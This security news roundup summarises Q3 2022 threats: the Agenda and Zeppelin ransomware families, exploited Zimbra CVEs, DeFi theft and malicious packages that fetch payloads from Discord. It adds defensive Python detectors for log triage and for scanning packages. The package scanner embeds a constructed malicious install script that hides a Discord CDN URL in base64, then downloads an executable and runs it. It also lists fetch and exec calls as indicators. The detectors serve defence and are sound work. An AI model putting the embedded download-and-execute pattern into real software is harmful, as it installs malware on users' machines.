Q3 2022 Security Update: Customized Ransomware Types Identified

Ransomware and other types of malware are now more customizable and tailored to victims.

Ransomware Type Can be Customized for Victims

A new ransomware family discovered in the wild, Agenda, has targeted healthcare and education organizations. It reportedly lets operators tailor the binary payload to each victim: they can choose the ransom note, the encryption settings, and the list of processes and services to terminate before data is encrypted. Agenda also makes use of Windows safe mode to evade detection.

Action Items:

Zeppelin Ransomware

The FBI and CISA warn of Zeppelin ransomware, a derivative of the Delphi-based Vega malware family that is operated as Ransomware-as-a-Service (RaaS). Since 2019, actors have used the malware against defense contractors, educational institutions, manufacturers, technology companies, and healthcare organizations.

Zeppelin actors gain initial access through RDP exploitation, SonicWall firewall vulnerabilities, and phishing campaigns. Before deploying the ransomware, they spend one to two weeks mapping the victim network to locate cloud storage and network backups, which are then targeted alongside production data.

Action Items:

  • Review the joint FBI and CISA advisory on Zeppelin
  • Strengthen your password policy
  • Require multifactor authentication (MFA)
  • Keep all software and firmware up to date
  • Segment networks
  • Use a monitoring tool to identify unusual activity
  • Grant permissions based on the principle of least privilege
  • Maintain offline backups of data and ensure all backup data is encrypted and immutable
  • Implement a recovery plan
  • Download the YARA signature for Zeppelin

Multiple CVEs Exploited Against Zimbra Collaboration Suite

The Cybersecurity and Infrastructure Security Agency (CISA) and the Multi-State Information Sharing and Analysis Center (MS-ISAC) report that threat actors are actively exploiting multiple common vulnerabilities and exposures (CVEs) in the Zimbra Collaboration Suite (ZCS), an email and collaboration platform.

CVEs include:

  • CVE-2022-24682: cross-site scripting (XSS) in the ZCS webmail Calendar feature
  • CVE-2022-27924: unauthenticated memcache command injection, which can expose ZCS account credentials in cleartext
  • CVE-2022-27925 chained with CVE-2022-37042: an authenticated arbitrary file upload through the mboximport (ZIP import) endpoint, combined with an authentication bypass, giving unauthenticated remote code execution
  • CVE-2022-30333: directory traversal in the unRAR utility that ZCS uses to process archives, allowing file writes during extraction

Any ZCS instance that has not received the corresponding patches is at risk.
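As an added example (not from the CISA/MS-ISAC alert), here is a small detector that scans web-server access-log lines for POST requests to the mboximport endpoint abused by the CVE-2022-27925 / CVE-2022-37042 chain. The endpoint path comes from the public advisories; the nginx "combined" log format, the triage rule (a 2xx response means the server accepted an upload and is rated high), and the sample lines are assumptions constructed for the example.

```python
"""Flag access-log lines that look like attempts against the Zimbra
mboximport endpoint used in the CVE-2022-27925 / CVE-2022-37042 chain.

Added example; not part of the CISA/MS-ISAC alert. The endpoint path is
documented in the advisories; the log format, sample lines and severity
rule are assumptions made for this illustration.
"""
import re
from dataclasses import dataclass

# Endpoint abused by the exploit chain (documented).
MBOXIMPORT_PATH = "/service/extension/backup/mboximport"

# Assumed nginx "combined" access-log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)


@dataclass
class Finding:
    ip: str
    ts: str
    target: str
    status: int
    severity: str  # "high" when the upload was accepted, "medium" otherwise


def canonical_path(target: str) -> str:
    """Drop the query string, lower-case and collapse repeated slashes so
    trivial path variations cannot dodge the match."""
    path = target.split("?", 1)[0]
    return re.sub(r"/+", "/", path).lower()


def flag_line(line: str):
    """Return a Finding for a POST to mboximport, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    if m["method"] != "POST":  # imports are uploads; GETs are noise
        return None
    if not canonical_path(m["target"]).startswith(MBOXIMPORT_PATH):
        return None
    status = int(m["status"])
    # Assumed triage rule: a 2xx means the server accepted the archive;
    # anything else is still an attempt worth correlating by source IP.
    severity = "high" if 200 <= status < 300 else "medium"
    return Finding(m["ip"], m["ts"], m["target"], status, severity)


def scan(lines):
    """Run flag_line over an iterable of log lines, keeping the hits."""
    return [f for f in (flag_line(l) for l in lines) if f]


# Constructed sample lines (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [11/Aug/2022:03:14:01 +0000] "POST /service/extension/backup/mboximport?account-name=admin HTTP/1.1" 401 0 "-" "python-requests/2.28.1"
203.0.113.7 - - [11/Aug/2022:03:14:02 +0000] "POST /service//extension/backup/mboximport?account-name=admin HTTP/1.1" 200 14 "-" "python-requests/2.28.1"
198.51.100.20 - - [11/Aug/2022:03:15:10 +0000] "GET /zimbra/mail HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
198.51.100.20 - - [11/Aug/2022:03:15:12 +0000] "POST /service/soap/SearchRequest HTTP/1.1" 200 812 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG.splitlines()):
        print(f"[{f.severity}] {f.ip} {f.ts} {f.status} {f.target}")
```

Legitimate administrative use of mboximport exists, so a hit is a lead to triage (who sent it, from where, and whether new files appeared under the Zimbra web root afterwards) rather than proof of compromise.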

Action items:

CISA and MS-ISAC recommend:

DeFi Vulnerabilities Enable Hackers to Steal Cryptocurrency

The FBI has identified actors exploiting vulnerabilities in DeFi smart contracts to steal investors' cryptocurrency. The FBI reports that between January and March 2022 criminals stole approximately $1.3 billion in cryptocurrency, almost 97 percent of it from DeFi platforms.

Action Items:

  • Research platforms, protocols, and smart contracts before investing
  • Ensure the DeFi platform has used independent auditors for code audits
  • Stay alert to the risks of crowdsourced vulnerability identification and patching: some participants may have malicious intentions.
  • Victims should contact the FBI through their local field office or the Internet Crime Complaint Center.

Actor Uses Discord to Steal Data

Snyk security researchers, who monitor open source package ecosystems, found 12 unique malicious packages published by the same actor. The packages were designed to evade detection while they compromised Windows hosts, downloading payloads from the Discord content delivery network (CDN) and executing them on the victim machine.

The malware targets data stored by user applications. When executed, it attempts to steal Google Chrome passwords, cookies, browsing history, search history, and bookmarks. With those credentials and session cookies, actors can move through a victim's online accounts as if they were the user.
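The download-and-execute chain described above can be caught statically before a package is installed. The following is an added example, not Snyk's tooling or the malware itself: it parses a Python install script, collects string literals (including any that are base64-encoded, a cheap way to hide a URL from a plain grep), looks for Discord CDN URLs, and pairs them with calls that fetch a file or hand it to the OS. The indicator lists, the assumed host cdn.discordapp.com, and both sample install scripts are constructed for the example.

```python
"""Static check for a package that pulls a payload from Discord's CDN and
runs it. Added example; not Snyk's code and not the malware. The call
lists, CDN host pattern and sample scripts are assumptions for illustration.
"""
import ast
import base64
import binascii
import re
from dataclasses import dataclass, field

DISCORD_CDN_RE = re.compile(
    r"https?://(?:cdn|media)\.discordapp\.(?:com|net)/\S+", re.I
)
# Assumed indicator lists: ways to fetch a file, and ways to run one.
FETCH_CALLS = {"urllib.request.urlretrieve", "urllib.request.urlopen", "requests.get"}
EXEC_CALLS = {
    "os.system", "os.startfile", "os.popen",
    "subprocess.Popen", "subprocess.run", "subprocess.call", "subprocess.check_output",
}


@dataclass
class Report:
    discord_urls: list = field(default_factory=list)
    fetch_calls: list = field(default_factory=list)   # (name, line)
    exec_calls: list = field(default_factory=list)    # (name, line)

    @property
    def verdict(self) -> str:
        if self.discord_urls and self.exec_calls:
            return "download-and-execute"
        if self.discord_urls:
            return "suspicious"
        if self.exec_calls or self.fetch_calls:
            return "review"  # build scripts do shell out legitimately
        return "clean"


def dotted_name(node):
    """Return 'a.b.c' for a Name/Attribute chain, else None."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def strings_in(tree):
    """Yield every string literal, plus the decoded text of any literal that
    is valid base64 (obfuscated URLs are often stored that way)."""
    for node in ast.walk(tree):
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            yield node.value
            try:
                yield base64.b64decode(node.value, validate=True).decode("utf-8")
            except (binascii.Error, UnicodeDecodeError, ValueError):
                continue


def scan_source(src: str) -> Report:
    """Parse install-script source and collect the three indicator classes."""
    tree = ast.parse(src)
    rep = Report()
    for s in strings_in(tree):
        rep.discord_urls.extend(DISCORD_CDN_RE.findall(s))
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            name = dotted_name(node.func)
            if name in FETCH_CALLS:
                rep.fetch_calls.append((name, node.lineno))
            elif name in EXEC_CALLS:
                rep.exec_calls.append((name, node.lineno))
    return rep


# Constructed samples (not real packages). The URL is hidden as base64.
_B64 = base64.b64encode(b"https://cdn.discordapp.com/attachments/1/2/updater.exe").decode()
SAMPLE_MALICIOUS = f'''
import base64, os, urllib.request
from setuptools import setup

_u = base64.b64decode("{_B64}").decode()
_p = os.path.join(os.getenv("APPDATA", "."), "updater.exe")
urllib.request.urlretrieve(_u, _p)
os.startfile(_p)

setup(name="useful-package", version="0.0.1")
'''
SAMPLE_BENIGN = '''
from setuptools import setup
setup(name="useful-package", version="0.0.1", packages=["useful"])
'''

if __name__ == "__main__":
    for label, src in (("malicious", SAMPLE_MALICIOUS), ("benign", SAMPLE_BENIGN)):
        rep = scan_source(src)
        print(label, rep.verdict, rep.discord_urls, rep.fetch_calls, rep.exec_calls)
```

The AST walk is what makes this better than a grep: it sees the call names regardless of spacing or aliasing through attribute chains, and decoding base64 literals recovers a URL the author tried to hide. It is still a heuristic: a payload fetched from any other host, or a URL assembled at runtime, will not be caught, which is why the network policy in the action items matters as a second layer.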

Action Items:

  • See the Snyk blog for the cyphers package, including a deep look at the malware’s executables.
  • Update security policies to prohibit users on your network from visiting sites other than those necessary for work.


For more security updates and insights, visit DevPro Journal’s Security resources page.